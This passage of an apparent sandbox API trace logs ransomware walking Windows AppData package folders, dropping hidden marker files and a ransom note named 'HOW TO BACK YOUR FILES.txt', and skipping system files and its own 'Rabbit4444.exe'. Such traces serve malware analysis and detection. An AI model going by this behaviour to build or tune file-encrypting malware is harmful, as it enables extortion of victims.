nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.201] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.201] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.201] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.201] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.202] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.202] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.202] CloseHandle (hObject=0x2a0) returned 1 [0063.202] CloseHandle (hObject=0x298) returned 1 [0063.202] GetCurrentThreadId () returned 0xd98 [0063.202] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122088 [0063.202] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe" [0063.202] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113d78 | out: hHeap=0xe0000) returned 1 [0063.202] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122080 | out: hHeap=0xe0000) returned 1 [0063.202] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe" [0063.202] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\" [0063.202] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0063.202] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.206] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.209] FlushFileBuffers (hFile=0x298) returned 1 [0063.210] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.210] CloseHandle (hObject=0x298) returned 1 [0063.211] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe") returned 75 [0063.211] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xb907b89d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef003cbb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0063.211] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.211] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.211] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.211] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.211] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xb907b89d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef003cbb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.211] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.211] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.211] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.211] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.211] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.211] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef003cbb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef003cbb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef00d915, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.211] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.211] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.211] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9750aec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x38ee4cbd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x38ee4cbd, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0063.211] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.211] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.211] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0063.211] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0063.211] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0063.212] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0063.212] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0063.212] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0063.212] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0063.212] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0063.212] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0063.212] lstrcpyW (in: lpString1=0x130ebd0, lpString2="AC" | out: lpString1="AC") returned="AC" [0063.212] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0063.212] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0x121710 [0063.212] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122288 [0063.212] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9704670, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba2bbc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9704670, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0063.212] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0063.212] lstrcpyW (in: lpString1=0x130ebd0, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0063.212] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0063.212] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118d38 [0063.212] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1222e8 [0063.212] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba32b1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9645a4f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0063.212] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.212] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.212] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0063.212] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0063.212] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0063.212] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0063.212] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0063.213] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0063.213] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0063.213] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0063.213] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0063.213] lstrcpyW (in: lpString1=0x130ebd0, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0063.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0063.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x1246a0 [0063.213] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x1222c8 [0063.213] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba3847, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9645a4f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0063.213] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0063.213] lstrcpyW (in: lpString1=0x130ebd0, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0063.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0063.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x123d48 [0063.213] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x121fa8 [0063.213] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba3f2a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9645a4f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0063.213] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.213] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.213] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0063.213] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0063.213] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0063.213] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0063.213] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0063.213] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0063.213] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0063.214] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0063.214] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0063.214] lstrcpyW (in: lpString1=0x130ebd0, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0063.214] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0063.214] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x123080 [0063.214] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122308 [0063.214] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7136507a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7136507a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0063.214] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0063.214] lstrcpyW (in: lpString1=0x130ebd0, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0063.214] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0063.214] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x124758 [0063.214] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122268 [0063.214] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb907b89d, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xb907b89d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xb907b89d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0063.214] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0063.214] lstrcpyW (in: lpString1=0x130ebd0, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0063.215] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0063.215] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x123140 [0063.215] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x122008 [0063.215] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1a14e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9645a4f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0063.215] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0063.215] lstrcpyW (in: lpString1=0x130ebd0, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0063.215] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0063.215] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x124250 [0063.215] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x1221a8 [0063.215] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1a14e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9645a4f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0063.215] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0063.215] lstrcpyW (in: lpString1=0x130ebd0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.215] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.216] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.216] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.216] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.216] CloseHandle (hObject=0x2a0) returned 1 [0063.216] CloseHandle (hObject=0x298) returned 1 [0063.216] GetCurrentThreadId () returned 0xd98 [0063.216] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0063.216] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState" [0063.216] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124250 | out: hHeap=0xe0000) returned 1 [0063.216] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0063.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState" [0063.216] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\" [0063.217] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0063.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.218] WriteFile (in: hFile=0x298, 